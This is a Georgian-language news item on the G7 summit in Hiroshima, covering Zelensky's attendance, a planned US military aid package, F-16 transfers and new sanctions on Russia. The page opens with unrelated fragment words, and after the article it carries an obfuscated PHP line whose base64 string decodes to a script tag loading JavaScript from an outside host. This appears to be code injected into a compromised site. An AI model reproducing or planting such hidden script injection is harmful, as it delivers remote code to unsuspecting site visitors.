celsiusi
ავერსი შნაიდერი

იაპონიის ქალაქ ჰიროსიმაში „დიდი შვიდეულის“ სამიტი გრძელდება. მსოფლიოს უმსხვილესი ეკონომიკის მქონე ქვეყნების ლიდერების განხილვის მთავარი თემაა ურთიერთობები პეკინთან და რუსეთის ომი უკრაინაში.

„დიდი შვიდეულის“ სახელმწიფოთა მეთაურებს დღეს შეუერთდება უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი. მას ჰიროსიმაში ასევე დაგეგმილი აქვს ორმხრივი მოლაპარაკებები სამიტის მონაწილეებთან. უკრაინის პრეზიდენტის ადმინისტრაციის ცნობით, დაგეგმილია ზელენსკის ორმხრივი შეხვედრა პრეზიდენტ ჯო ბაიდენთან.

როგორც გამოცემა „პოლიტიკო“ , ჰიროსიმაში ზელენსკისთან შეხვედრის შემდეგ ბაიდენი გეგმავს უკრაინისთვის 375 მილიონი დოლარის ღირებულების სამხედრო დახმარების ახალი პაკეტის გამოცხადებას.

მედიის ცნობით, დახმარების ახალი პაკეტი ითვალისწინების საარტილერიო ჭურვებს, ჯავშანტექნიკას და ტანკსაწინააღმდეგო შეიარაღებას.

მანამდე ტელეკომპანია „სიენენმა“ გაავრცელა ინფორმაცია, რომლის თანახმადაც, აშშ-ის პრეზიდენტმა მიანიშნა, რომ ვაშინგტონი მესამე ქვეყნებს „ეფ-16“-ის ტიპის გამანადგურებლების უკრაინისთვის გადაცემის ნებას დართავს. ასევე, ბაიდენმა „დიდი შვიდეულის“ ლიდერებს აცნობა, რომ აშშ უკრაინელი მფრინავების მომზადების საერთაშორისო ძალისხმევას დაუჭერს მხარს.

სამიტის პირველ დღეს „დიდი შვიდეულის“ ლიდერები რუსეთის წინააღმდეგ სანქციების გამკაცრებაზე შეთანხმდნენ, ასევე უკრაინას ფინანსური მხარდაჭერის გაგრძელებას დაჰპირდნენ. დიდი შვიდეულის ლიდერებმა, ერთობლივი განცხადებით, რუსეთს უკრაინის მთელი ტერიტორიიდან შეიარაღებული ძალების სრულად, უპირობოდ და დაუყოვნებლივ გაყვანისკენ მოუწოდეს.

354
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");